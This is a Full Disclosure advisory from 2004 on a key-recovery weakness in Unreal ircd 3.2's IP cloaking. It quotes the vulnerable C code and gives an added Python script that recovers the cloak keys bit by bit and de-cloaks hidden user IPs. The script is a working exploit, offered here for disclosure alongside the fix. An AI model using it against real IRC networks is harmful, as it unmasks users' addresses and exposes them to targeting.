Full Disclosure mailing list archives

Unreal ircd 3.2 cloaking subsystem vulnerability
From: bartavelle <bartavelle-anti-spam-thingie () banquise net>
Date: Mon, 05 Jul 2004 14:23:55 +0200

Software name:          Unreal ircd
Vulnerable versions:    3.2 and probably previous versions
Problem nature:         Information disclosure

Summary:
Unreal ircd is a popular IRC server. One of the features it provides is
called 'IP cloaking'. The purpose of this system is to prevent hostile
IRC users from learning the IP addresses of other users.

To prevent brute-forcing of the cloaked addresses, the cloak is keyed
with three secret 'keys' (KEY, KEY2 and KEY3 in the source). However, the
way the keys are mixed into the hash is weak.

It is possible to recover the keys of several IRC networks knowing only
one clear-text IP together with its cloaked form, plus one additional
cloaked IP.

Details:
The IPv4 hashing scheme is the most vulnerable. Code from cloak.c
follows:

====
/* Do IPv4 cloaking here */
strlcpy(h1, host, sizeof h1);
i = 0;
for (i = 0, p = strtok(h1, "."); p && (i <= 3); p = strtok(NULL, "."), i++)
{
        strncpy(h2[i], p, 4);
}
ircsprintf(h3, "%s.%s", h2[0], h2[1]);
l[0] = ((our_crc32(h3, strlen(h3)) + KEY) ^ KEY2) + KEY3;
ircsprintf(h3, "%s.%s.%s", h2[0], h2[1], h2[2]);
l[1] = ((KEY2 ^ our_crc32(h3, strlen(h3))) + KEY3) ^ KEY;
l[4] = our_crc32(host, strlen(host));
l[2] = ((l[4] + KEY3) ^ KEY) + KEY2;
l[2] &= 0x3FFFFFFF;
l[0] &= 0x7FFFFFFF;
l[1] &= 0xFFFFFFFF;
snprintf(cloaked, sizeof cloaked, "%lX.%lX.%lX.IP", l[2], l[1], l[0]);
free(host);
return cloaked;
====

h2[0], h2[1], h2[2], h2[3] hold the four dotted-decimal octets of the
original IP as strings, and l[0], l[1], l[2] become the three words of
the cloaked host (printed as l[2].l[1].l[0].IP). All arithmetic is on
32-bit unsigned values. Writing KEY as key1, for the IP 1.2.3.4:

l[0] = (((crc32("1.2") + key1) ^ key2) + key3) & 0x7FFFFFFF;
l[1] = (((crc32("1.2.3") ^ key2) + key3) ^ key1) & 0xFFFFFFFF;
l[2] = (((crc32("1.2.3.4") + key3) ^ key1) + key2) & 0x3FFFFFFF;

For the known IP, the crc32() values and the l[x] are known; only the
keys are unknown. The three keys are combined with the CRCs using only
addition and XOR, so bit n of any key cannot affect bits below n of the
hash, and the keys can therefore be recovered one bit at a time starting
from the least significant bit.

We have successfully written a program that brute-forces one bit at a
time. It takes less than one second to do that on a Pentium 4 at 1.8 GHz.

Doing this on one known IP leaves around 2000 possible key combinations
rather than a single one (the masks discard bit 31 of l[0] and bits 30
and 31 of l[2], and the remaining constraints do not pin down every key
bit on their own). It is then trivial to test them all against the
second cloaked IP, keeping the key sets that map it back to a valid
dotted-quad address, in order to find the working ones.
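The following Python is an added example, not the advisory author's program and not Unreal's code. It ports the IPv4 cloak above, runs the bit-by-bit key recovery against one known (IP, cloaked IP) pair, and then uses a second cloaked host to filter the surviving key sets and de-cloak it. It assumes zlib's CRC-32 as a stand-in for our_crc32() (the method itself does not depend on which CRC is used, because every CRC value involved is either known or brute-forced over the 256 possible octet values) and uses constructed keys and sample hosts.

```python
"""Added example: recover Unreal ircd 3.2's three IPv4 cloak keys from one
known (IP, cloaked IP) pair, bit by bit, then use a second cloaked host to
pick the working key set and de-cloak it.  Not the advisory author's tool."""
import zlib

M32 = 0xFFFFFFFF
OUT_MASKS = (0x7FFFFFFF, 0xFFFFFFFF, 0x3FFFFFFF)  # masks applied to l[0], l[1], l[2]


def crc32(s):
    # Assumed stand-in for Unreal's our_crc32(); replace with a port of it for real targets.
    return zlib.crc32(s.encode()) & M32


def raw_hash(crcs, keys):
    """The three 32-bit words from cloak.c before the output masks (arithmetic mod 2^32)."""
    c0, c1, c2 = crcs            # crc32("a.b"), crc32("a.b.c"), crc32("a.b.c.d")
    k1, k2, k3 = keys            # KEY, KEY2, KEY3
    l0 = ((((c0 + k1) & M32) ^ k2) + k3) & M32
    l1 = ((((c1 ^ k2) + k3) & M32) ^ k1) & M32
    l2 = ((((c2 + k3) & M32) ^ k1) + k2) & M32
    return l0, l1, l2


def ip_crcs(ip):
    a, b, c, _ = ip.split(".")
    return crc32(f"{a}.{b}"), crc32(f"{a}.{b}.{c}"), crc32(ip)


def cloak(ip, keys):
    """Port of the IPv4 cloak; same layout as the C snprintf ("%lX.%lX.%lX.IP")."""
    l0, l1, l2 = (v & m for v, m in zip(raw_hash(ip_crcs(ip), keys), OUT_MASKS))
    return f"{l2:X}.{l1:X}.{l0:X}.IP"


def parse_cloak(cloaked):
    l2, l1, l0, _ = cloaked.split(".")
    return int(l0, 16), int(l1, 16), int(l2, 16)


def recover_key_candidates(ip, cloaked):
    """Only + and ^ are used, so bit n of a key never affects hash bits below n.
    Extend the partial keys one bit at a time (8 choices per bit) and keep every
    combination whose low bits still reproduce the observed (unmasked) hash bits."""
    crcs, observed = ip_crcs(ip), parse_cloak(cloaked)
    candidates = [(0, 0, 0)]
    for n in range(32):
        low, bit = (1 << (n + 1)) - 1, 1 << n
        nxt = []
        for k1, k2, k3 in candidates:
            for choice in range(8):
                keys = (k1 | (bit if choice & 1 else 0),
                        k2 | (bit if choice & 2 else 0),
                        k3 | (bit if choice & 4 else 0))
                if all(((v ^ o) & m & low) == 0
                       for v, o, m in zip(raw_hash(crcs, keys), observed, OUT_MASKS)):
                    nxt.append(keys)
        candidates = nxt
    return candidates


def build_ab_table():
    """crc32("a.b") -> list of "a.b" for all 65536 first-octet pairs (a list, since CRC-32 may collide)."""
    table = {}
    for a in range(256):
        for b in range(256):
            table.setdefault(crc32(f"{a}.{b}"), []).append(f"{a}.{b}")
    return table


def decloak(cloaked, keys, ab_table):
    """Invert l[0] back to crc32("a.b") (bit 31 is masked off, so try both values),
    look it up, then brute-force the third and fourth octets against l[1] and l[2].
    Returns the clear-text IP, or None if this key set does not fit."""
    l0, l1, l2 = parse_cloak(cloaked)
    k1, k2, k3 = keys
    for top in (0, 1 << 31):
        c0 = (((((l0 | top) - k3) & M32) ^ k2) - k1) & M32
        for ab in ab_table.get(c0, ()):
            for c in range(256):
                if raw_hash((0, crc32(f"{ab}.{c}"), 0), keys)[1] != l1:
                    continue
                for d in range(256):
                    ip = f"{ab}.{c}.{d}"
                    if (raw_hash((0, 0, crc32(ip)), keys)[2] & OUT_MASKS[2]) == l2:
                        return ip
    return None


def attack(known_ip, known_cloak, target_cloak):
    """Key sets that survive the bit-by-bit search and also de-cloak the second host."""
    table = build_ab_table()
    found = {}
    for keys in recover_key_candidates(known_ip, known_cloak):
        ip = decloak(target_cloak, keys, table)
        if ip is not None:
            found[keys] = ip
    return found


if __name__ == "__main__":
    KEYS = (0x5A3C9F21, 0x1E4B7D90, 0x7F0C2A6D)         # constructed secret keys
    known_ip, target_ip = "192.168.10.23", "10.0.42.7"  # constructed sample hosts
    known, target = cloak(known_ip, KEYS), cloak(target_ip, KEYS)
    found = attack(known_ip, known, target)
    print(f"{len(found)} key set(s) fit; {target} -> {sorted(set(found.values()))}")
```

Several key sets normally survive both stages: bit 31 of the keys only reaches bit 31 of the hash, and l[1] is the only word that exposes it, so key sets that differ there but agree on the parity of their top bits produce identical cloaks for every host and are indistinguishable by design. Against a real Unreal 3.2 cloak, crc32() must be replaced with a port of our_crc32() from cloak.c.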

Solution:
Update to version 3.2.1

Up to date information:
http://www.bandecon.com/?action=advisory&adv=unreal

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

